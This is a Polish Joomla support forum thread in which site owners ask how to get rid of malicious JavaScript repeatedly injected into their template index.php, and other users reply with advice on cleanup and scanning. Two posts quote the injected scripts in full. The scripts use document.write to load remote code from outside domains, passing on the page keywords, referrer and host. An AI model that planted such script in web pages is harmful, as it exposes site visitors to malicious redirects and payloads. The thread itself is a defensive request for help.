PDA

Zobacz pełną wersję : Wirus jak się go pozbyć



pawelpap
05-07-2016, 14:29
Walczę od jakiegoś czasu... co pewien czasu umieszcza mi w kodzie w index.php w sekcji head takie oto badziestwo : "<script>var a='';setTimeout(10);if(document.referrer.indexOf(l ocation.protocol+"//"+location.host)!==0||document.referrer!==undefined ||document.referrer!==''||document.referrer!==null ){document.write('<script type="text/javascript" src="http://newsco.fr/js/jquery.min.php?c_utt=SWR2D2&c_utm='+encodeURIComponent('http://newsco.fr/js/jquery.min.php'+'?'+'default_keyword='+encodeURICo mponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(met as){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window. location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer )+'&source='+encodeURIComponent(window.location.host)) +'"><'+'/script>');}</script>"

Zmieniałem hasła administratora, do serwera itd i dalej to samo... nie wiem może gdzieś jeszcze w innych plikach dodaje ... jak to badziewstwo usunąć na dobre ?

zwiastun
05-07-2016, 14:37
Artykuł Witryna po włamaniu na joomla.pl Kolega czytał? Zastosował się do opisanej tam metodyki postępowania po włamaniu?

pawelpap
05-07-2016, 14:43
Czytał ... wydaje mi się że nie znalazłem jakiegoś zainfekowanego pliku.... może ktoś miał podobnego wirusa i podpowie gdzie szukać ?

slomers
23-09-2016, 07:07
Cześć mam podobny problem... z góry odpowiadam artykuł czytałem już nie raz :)
Kod umieszczany w index.php w templates. Na wszystkich moich stronach...

Kod: script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b) )return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://jiva-klatovy.cz/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'K85164' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Nie potrafię sobie z tym poradzić, już kilka miesięcy z tym walczę :/

komodore
23-09-2016, 08:18
Jeśli nie dajecie rady z opisem, który wskazał zwiastun (http://forum.joomla.pl/member.php?8-zwiastun), to powinniście dać komuś kto się na tym zna, zakładając temat w dziale zleceń. Niestety infekcje choć podobne nie są takie same i nie ma uniwersalnego rozwiązania. Leczenie może być bardzo czasochłonne w zależności od infekcji. Jeśli strona nie ma zbyt wiele treści, to proponuję wykasować wszystko (łącznie z usunięciem starej bazy danych), pozmieniać hasła i postawić ją od nowa.

tadzio
23-09-2016, 16:47
A prosiliście providera o pomoc w przeskanowaniu witryny? U mnie pomogło (szybko i sprawnie dzięki Linuxpl.com)
Można też skopiować witrynę do siebie i przeskanować.
Są też witryny skanujące (nie pytajcie o nazwę bo nie pamiętam).

janosik0320
26-09-2016, 15:13
Jeśli nie dajecie rady z opisem, który wskazał zwiastun, to powinniście dać komuś kto się na tym zna

Nic dodać nic ująć. Szukanie na własną rękę nie mając w tym doświadczenia to jak szukanie igły...

himself007
07-11-2016, 14:33
Sprubujcie przeskanowac serwer tym antiwirusem powinno pomoc (ciach - niedozowolona reklama)

pkosela
08-11-2016, 12:33
Sprubujcie

Co jak co, ale strona internetowa narzędzia z dziedziny bezpieczeństwa powinna budzić zaufanie.
Wasza nie wzbudza.
Wręcz przeciwnie.

Bazyl
08-11-2016, 13:00
powinna budzić zaufanie

Nie chodzi o zaufanie, a o wejścia na stronę ;-)
Ja nie wszedłem...

trzepiz
08-11-2016, 14:25
Nie potrafię sobie z tym poradzić, już kilka miesięcy z tym walczę :/
Pomyśl ile czasu straciłeś. Ile straciła twoja strona w oczach Google (jeśli jest zainfekowana przez kilka miesięcy). Jest też spora szansa, że trafiasz po kolei na każdą możliwą listę RBL, co w konsekwencji całkowicie uniemożliwi wysyłanie e-maili z twojej domeny, lub co gorsze z IP serwera.

Sugeruję rozeznać się w możliwościach, cenach jakie oferują osoby/firmy się tym zajmujące. Bardzo często okazuje się, że wszystko można naprawić w 24 - 48 godzin i nie jest to strasznie drogie.

Chciałbym także przestrzec przed bezgranicznym ufaniem w wyniki skanowania "skanerów online". Większość nie ma dostępu do wszystkich Twoich plików - więc nie mają możliwości sprawdzić Twojej strony w 100%. Wyczyścisz kilka wskazanych przez nie plików, a za 3 dni będzie to samo.

dawidryba11
08-11-2016, 16:38
Prawda jest taka, ze skanery online moga co jedynie wyszukac wirusa w JS albo juz wynik w postaci HTML czyli tylko i wylacznie skutki. Przyczyn nie znajdzie.

Sluchaj Trzepiza. Zaden wirus mu nie straszny.

Wysłane z mojego E2105 przy użyciu Tapatalka

PeFik
21-02-2017, 16:41
Są 3 rodzaje skanerów:
a) zewnętrze, strony online
b) wewnętrzne oparte o komponenty
c) "niezależne" czyli skanują pliki bazując na wewnętrznym silniku, czyli bez względu jaki to jest CMS

Opisałem wszystkie trzy , rozdz 2, 5 i 6 >> http://helion.pl/view/3926o/jowozr.htm